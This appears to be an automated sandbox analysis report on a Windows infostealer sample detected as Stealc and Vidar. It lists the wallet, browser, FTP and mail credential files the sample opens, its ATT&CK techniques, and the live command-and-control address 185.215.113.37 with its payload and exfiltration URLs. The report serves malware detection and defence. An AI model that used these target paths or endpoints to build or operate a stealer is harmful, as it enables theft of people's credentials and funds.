Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.SE

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7076, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1700366205.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7076, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Reputation
http://185.215.113.37/	true	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BAECFCAA.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	BAECFCAA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllGr	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BAECFCAA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll#	file.exe, 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllQr-	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpCO	file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	BFCGDAAKFHIDBFIDBKFH.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpGDAAKFHIDBFIDBKFH	file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phps	file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BAECFCAA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllG	file.exe, 00000000.00000002.1902187290.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll=r1	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpGDAAKFHIDBFIDBKFHR	file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1924459555.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll1#	file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BAECFCAA.0.dr	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php=	file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BAECFCAA.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpus.wallet	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000003.1776072174.000000001D46C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	BAECFCAA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpE	file.exe, 00000000.00000002.1902187290.0000000001147000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php.	file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	BAECFCAA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpVB	file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.php=C	file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.php6	file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp, BFCGDAAKFHIDBFIDBKFH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpes	file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.php3QF2	file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllc	file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org	KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpWi6Fo	file.exe, 00000000.00000002.1902187290.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll_so	file.exe, 00000000.00000002.1902187290.0000000001162000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BAECFCAA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpBRx	file.exe, 00000000.00000002.1902187290.0000000001135000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521524
Start date and time:	2024-09-28 21:25:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 78 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
